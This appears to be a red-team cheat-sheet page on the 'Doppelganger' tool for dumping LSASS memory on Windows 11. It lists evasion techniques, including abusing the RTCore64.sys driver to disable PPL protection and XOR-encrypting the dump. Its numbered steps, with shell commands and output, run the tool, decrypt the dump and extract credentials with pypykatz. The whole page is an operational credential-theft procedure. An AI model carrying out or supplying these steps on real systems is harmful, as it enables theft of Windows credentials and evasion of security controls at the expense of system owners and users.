# Doppelganger: Cloning and Dumping LSASS (Win11)

{% embed url="<https://vari-sh.github.io/posts/doppelganger/#bonus-hollowreaper--advanced-process-hollowing>" %}

* Dynamic API resolution with obfuscation
* SYSTEM token manipulation
* Process cloning with NtCreateProcessEx
* Direct memory access via RTCore64.sys to disable PPL
* XOR encryption for stealth dump writing on disk

1. **Doppelganger.exe (execute)**
2. **put the driver into the Public Folder: (**&#x52;TCore64.sys)
3. Execute: **Doppelganger.exe**&#x20;
4. user the xor python script to unxored the created dump: <https://github.com/vari-sh/RedTeamGrimoire/blob/main/Doppelganger/utils/decrypt_xor_dump.py>\
   \
   \
   ──(kali㉿kali)-\[\~/Downloads]\
   └─$ python xored.py doppelganger.dmp\
   \[+] Decryption successful. Output written to: doppelganger.dmp.dec<br>
5. use pypykatz to get the credentials\
   \
   ┌──(kali㉿kali)-\[\~/Downloads]\
   └─$ pypykatz lsa minidump doppelganger.dmp.dec